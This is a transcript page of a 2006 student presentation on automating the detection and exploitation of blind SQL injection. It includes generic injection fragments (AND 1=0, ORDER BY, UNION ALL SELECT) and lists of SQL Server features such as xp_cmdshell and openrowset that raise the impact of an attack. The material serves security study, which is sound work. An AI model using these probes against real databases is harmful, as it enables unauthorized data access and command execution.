Presentation is loading. Please wait.

Presentation is loading. Please wait.

Automated Estimation and Evaluation of SQL-injection Vulnerabilities Jonas Persson, Group 30 - Language based security 2006.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Automated Estimation and Evaluation of SQL-injection Vulnerabilities Jonas Persson, Group 30 - Language based security 2006."— Presentation transcript:

1 Automated Estimation and Evaluation of SQL-injection Vulnerabilities Jonas Persson, Group 30 - Language based security 2006

2 Contents  The impact of SQL-injection  Blindfolded SQL-injection  What has been done before  Automating the process  Results  Conclusions

3 Impact of SQL-injection  Sysobjects – stores info on all tables in the database  Sysdatabases – stores info on all databases on server  Xp_cmdshell – executes arbitrary commands  Bcp – write to arbitrary file  Openrowset – transfer data from/to remote SQL-server  Xp_regwrite – write arbitrary registry values  Bulk insert – insert from arbitrary file

4 Blindfolded SQL-injection  Should not rely on contents of error messages  The only relevant question is – did the query execute or not?  Procedure: Determine errorsDetermine errors Find format and query structureFind format and query structure ExploitExploit

5 What has been done before  Automated datamining using blindfolded SQL-injection (Absinthe by Cameron Hotchkies)  Vulnerability scanning tools with support for finding SQL-injections

6 Limitations  Absinthe only mines for data from existing injections, does not find the vulnerabilities  All vulnerability scanning tools I have tested only appends a single quote at the end of parameter values and report a vulnerability if the server returns a ”500 – internal server error”

7 Automating the process  Determine errors Appending ” AND ” should give incorrect syntax errorAppending ” AND ” should give incorrect syntax error Appending ” AND 1=0 ” should result in errorAppending ” AND 1=0 ” should result in error Appending ” AND 1=1 ” should not result in errorAppending ” AND 1=1 ” should not result in error  Comparing to these results will tell us wether appending ” AND (any sql) ” executed or not

8 Automating the process  Finding format Appending ” -- ” might remove necessary ending parenthesesAppending ” -- ” might remove necessary ending parentheses Breaking out of parentheses by trying to end them one by one until the query executesBreaking out of parentheses by trying to end them one by one until the query executes  More advanced formats does not require this procedure

9 Automating the process  Finding the query structure How many columns does the query select? Try ordering! ” ORDER BY 1 -- ”How many columns does the query select? Try ordering! ” ORDER BY 1 -- ” Which types does the selected columns have?Which types does the selected columns have? Three base types strings, ints and datesThree base types strings, ints and dates Append ” UNION ALL SELECT null -- ”Append ” UNION ALL SELECT null -- ” Append ” UNION ALL SELECT 1 -- ”Append ” UNION ALL SELECT 1 -- ” Append ” UNION ALL SELECT ’1’ -- ”Append ” UNION ALL SELECT ’1’ -- ”

10 Automating the process  Once you have found the format and structure, exploiting is easy! ” UNION ALL SELECT columns FROM table -- ”

11 Automating the process  Checking the impact Selecting from system tablesSelecting from system tables Running stored proceduresRunning stored procedures Connect to other servers through openrowsetConnect to other servers through openrowset Read files with bulk insertRead files with bulk insert Options are limitless!Options are limitless!

12 Results  A program that Evaluates a parameter and returns how likely it is that the parameter is vulnerable and exploitableEvaluates a parameter and returns how likely it is that the parameter is vulnerable and exploitable Finds format and query structureFinds format and query structure Estimates how vulnerable the parameter is on a scale from 1 to 10Estimates how vulnerable the parameter is on a scale from 1 to 10 Reports its findings to the user, detailing the vulnerability and its impactReports its findings to the user, detailing the vulnerability and its impact

13 Results

14 Conclusions  As we just have seen it is indeed possible to automate the search and exploitation of SQL-injection vulnerabilities  The example can be extended in many different ways to create either a versatile audit tool or a powerful hacking tool

Download ppt "Automated Estimation and Evaluation of SQL-injection Vulnerabilities Jonas Persson, Group 30 - Language based security 2006."

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
CC SQL Utilities.

CC SQL Utilities.
Query Methods (SQL). What is SQL A programming language for databases. SQL (structured Query Language) It allows you add, edit, delete and run queries.

Query Methods (SQL). What is SQL A programming language for databases. SQL (structured Query Language) It allows you add, edit, delete and run queries.
Module 8 Importing and Exporting Data. Module Overview Transferring Data To/From SQL Server Importing & Exporting Table Data Inserting Data in Bulk.

Module 8 Importing and Exporting Data. Module Overview Transferring Data To/From SQL Server Importing & Exporting Table Data Inserting Data in Bulk.
Moving Data Lesson 23. Skills Matrix Moving Data When populating tables by inserting data, you will discover that data can come from various sources.

Moving Data Lesson 23. Skills Matrix Moving Data When populating tables by inserting data, you will discover that data can come from various sources.
Let’s try Oracle. Accessing Oracle The Oracle system, like the SQL Server system, is client / server. For SQL Server, –the client is the Query Analyser.

Let’s try Oracle. Accessing Oracle The Oracle system, like the SQL Server system, is client / server. For SQL Server, –the client is the Query Analyser.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
SQL Injection and Buffer overflow

SQL Injection and Buffer overflow
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Figure 1. Hit analysis in 2002 of database-driven web applications Hits by Category in 2002 N = 73,873 Results Reporting 27% GME 26% Research 20% Bed Availability.

Figure 1. Hit analysis in 2002 of database-driven web applications Hits by Category in 2002 N = 73,873 Results Reporting 27% GME 26% Research 20% Bed Availability.
SQL-Injection attacks Damir Lizdek & Dan Rundlöf Language-based security.

SQL-Injection attacks Damir Lizdek & Dan Rundlöf Language-based security.
1 Chapter Overview Transferring and Transforming Data Introducing Microsoft Data Transformation Services (DTS) Transferring and Transforming Data with.

1 Chapter Overview Transferring and Transforming Data Introducing Microsoft Data Transformation Services (DTS) Transferring and Transforming Data with.
Check That Input Preventing SQL Injection Attacks By Andrew Morton For CS 410.

Check That Input Preventing SQL Injection Attacks By Andrew Morton For CS 410.
Advance Computer Programming Java Database Connectivity (JDBC) – In order to connect a Java application to a database, you need to use a JDBC driver. –

Advance Computer Programming Java Database Connectivity (JDBC) – In order to connect a Java application to a database, you need to use a JDBC driver. –
MIS 5211.001 Week 11 Site:

MIS Week 11 Site:
CSCI 6962: Server-side Design and Programming JDBC Database Programming.

CSCI 6962: Server-side Design and Programming JDBC Database Programming.
Database testing Prepared by Saurabh sinha. Database testing mainly focus on: Data integrity test Data integrity test Stored procedures test Stored procedures.

Database testing Prepared by Saurabh sinha. Database testing mainly focus on: Data integrity test Data integrity test Stored procedures test Stored procedures.
How to Hack a Database.  What is SQL?  Database Basics  SQL Insert Basics  SQL Select Basics  SQL Where Basics  SQL AND & OR Basics  SQL Update.

How to Hack a Database.  What is SQL?  Database Basics  SQL Insert Basics  SQL Select Basics  SQL Where Basics  SQL AND & OR Basics  SQL Update.
Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science.

Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science.

Similar presentations

Ads by Google